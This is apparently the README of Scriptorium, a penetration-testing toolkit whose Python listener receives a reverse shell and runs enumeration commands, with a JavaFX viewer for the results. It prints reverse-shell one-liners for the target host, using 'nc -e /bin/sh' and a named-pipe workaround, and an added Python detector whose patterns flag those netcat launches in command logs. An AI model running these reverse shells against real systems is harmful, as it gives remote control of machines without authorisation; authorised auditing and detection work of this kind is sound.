Scriptorium is a collection of tools for Linux machine state and network enumeration, data visualisation and analysis. It aims to help during penetration tests and security audits by simplifying the machine and network enumeration needed to detect configuration problems and possible privilege escalation vulnerabilities on hosts.
Data is collected using the "scriptenum.py" tool. The output is written to human-readable text files (.txt) and to data files (.dat) that are read by IAE.
Scriptorium IAE can be used to visualise, search, analyse and annotate the enumeration output. It also integrates with the Exploit DB and allows enumerating a network topology.
scriptenum.py is a Python script that, in remote enumeration mode, waits for an incoming connection from a reverse bind shell, then executes more than 300 commands to assess the state of the target machine. Once this is done, it drops into an interactive shell whose output is logged as part of the data files as well. If the connection is dropped during the enumeration, the tool waits for a reconnect and continues where it was interrupted.
The manual shell sends a keep-alive pulse to help prevent accidental drops, and the internal command help can be invoked by typing '?' as the command. The tool can also be started for local machine enumeration, creating data files that can likewise be fed to IAE. Moreover, the script provides an interactive shell mode whose session is logged into the standard output data files.
Note: Before running against a host, perform a test run from another terminal window on your local machine.
Usage: Remote Enumeration
The script should be started from within the pen-test "project directory", empty or not. The tool creates all data files in the current directory. New runs do not overwrite the previous files; the new data files are added to the same project, as long as they are in the same project folder. The output files are .txt files, for humans still in love with nano or vi, and .dat files to be read by IAE. Both file types contain the same information.
Default listening port is 8189.
/projects/test123$ python /whatever/scriptorium.py -o enum
/projects/test123$ python /whatever/scriptorium.py -o enum -p 8080
/projects/test123$ python /whatever/scriptorium.py -h
On the target host, all that is needed is a netcat started like this:
/home/bernd$ nc -v -e /bin/sh host port
Some netcat versions (like the OpenBSD one) do not have the 'execute' switch integrated (smart :). In this case, there are ways to handle that issue using a Linux FIFO (named pipe).
rm -f /tmp/scriptoriumpipe
mkfifo /tmp/scriptoriumpipe
cat /tmp/scriptoriumpipe | /bin/sh -i 2>&1 | nc ip port > /tmp/scriptoriumpipe
rm -f /tmp/scriptoriumpipe
mkfifo scriptoriumpipe ; nc host 2600 0<scriptoriumpipe | /bin/bash 1>scriptoriumpipe
Note: The shell code above was found on the Internet; HT to the authors. Change 'scriptoriumpipe' to something more neutral and short :)
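Seen from the defending side, the two netcat launch patterns shown above (the 'execute' switch, and the FIFO workaround) are easy to pick out of recorded command lines such as shell history or process-exec audit records. The detector below is an added example, not part of Scriptorium; the log records and the 192.0.2.10 address are constructed.

```python
import re

# Added example, not part of Scriptorium. It flags the two netcat launch
# patterns shown in this README (the -e switch and the FIFO workaround) in
# recorded command lines, e.g. shell history or process-exec audit records.
NC = r"(?:^|[\s|;&(])(?:nc|ncat|netcat)\b"          # a netcat binary
SH = r"/bin/(?:ba|da|z)?sh\b"                       # a shell binary
# a real file redirection (not 2>&1 and not /dev/null), e.g. 0<pipe or > /tmp/pipe
REDIR = r"[0-9]?[<>]\s*(?!&|/dev/null)[\w./-]+"

def classify(cmd):
    """Return the matching rule name for one command line, or None."""
    if not re.search(NC, cmd):
        return None
    # netcat told to execute a shell on connect (also catches combined flags like -ve)
    if re.search(NC + r"[^|;]*\s-\w*e\s+" + SH, cmd):
        return "nc_exec_shell"
    # netcat and a shell tied together by a pipe plus a fifo (mkfifo or file redirection)
    if re.search(SH, cmd) and "|" in cmd and ("mkfifo" in cmd or re.search(REDIR, cmd)):
        return "fifo_shell_pipe"
    return None

def scan(records):
    """records: iterable of (user, cmdline); returns [(user, rule, cmdline), ...] for hits."""
    hits = []
    for user, cmd in records:
        rule = classify(cmd)
        if rule:
            hits.append((user, rule, cmd))
    return hits

# Constructed sample records; 192.0.2.10 is a documentation address, not a real host.
SAMPLE = [
    ("bernd", "nc -v -e /bin/sh 192.0.2.10 8189"),
    ("bernd", "rm -f /tmp/sp; mkfifo /tmp/sp; cat /tmp/sp | /bin/sh -i 2>&1 | nc 192.0.2.10 8189 > /tmp/sp"),
    ("bernd", "nc 192.0.2.10 2600 0</tmp/sp | /bin/bash 1>/tmp/sp"),
    ("ops",   "nc -zv 192.0.2.10 22"),                                  # port check, benign
    ("ops",   "grep -e error /var/log/syslog | nc logs.internal 514"),  # -e belongs to grep
    ("ops",   "python scriptorium.py -o local"),
]

if __name__ == "__main__":
    for user, rule, cmd in scan(SAMPLE):
        print(f"{rule:16} {user:6} {cmd}")
```

The last three sample lines show the false-positive cases the rules are written to skip: a plain port check, a `-e` that belongs to another program in the pipeline, and no netcat at all.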
Usage: Local Enumeration
To run the script on the local machine and just create the output files, without network operations, use the "-o local" flag.
Usage: Interactive Shell
Just start the tool and wait for an incoming connection as described in the section 'Remote Enumeration'.
/projects/test123$ python /whatever/scriptorium.py -o shell -p 8080
/projects/test123$ python /whatever/scriptorium.py -h
Scriptorium IAE takes the output files generated by the Python tool and displays them in a hierarchical, easy-to-browse way. It is searchable, and commands are bookmarkable. The user can make annotations, stored beside the 'raw' data files, in order to keep them safe for later.
The application requires Java 8 (which includes JavaFX 8) to be installed. No other tool or dependency. No database. The tool can be started by executing the JAR file, as described below.
Build 'n Run
You can either use Maven to build, or open the project in your favorite IDE and hit "RUN".
# Build
$> mvn package
# Run via maven
$> mvn exec:java
# Run the JAR
$> java -jar target/be.imifos.scriptorium-1.0.0-SNAPSHOT.jar
Sometimes double-clicking the JAR just executes the above line.
Note: On Linux, you need to install JavaFX separately when using OpenJDK:
$> sudo apt-get install openjfx
I use a self-made mini framework to manage the JavaFX TreeView. That's why the code is a bit more complicated than it could be for this simple case (no backing database, just 3 node types). Moreover, I fully dive into object-oriented design by using interfaces to drive behaviour and by treating the "Classes" (not only objects) as full citizens.
I'm sorry for requiring Java 8, but once you have tasted the amazing power of Lambda Expressions, you wonder how you were ever able to live without ;-)
Ah yes, in case you wondered... IAE stands for Integrated Analysis Environment. It's inspired by IDE and obviously the best name I ever came up with and the most professional thing in this project. ;-)
License (Short Version)
TLDR; It's free, but you use it at your own risk!
This tool may be used for legal purposes only. Users take full responsibility for any actions performed using this tool. The author accepts no liability for damage caused by this tool. If you do not accept these conditions then you are prohibited from using this tool.
In all other respects the GPL version 2 applies:
This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.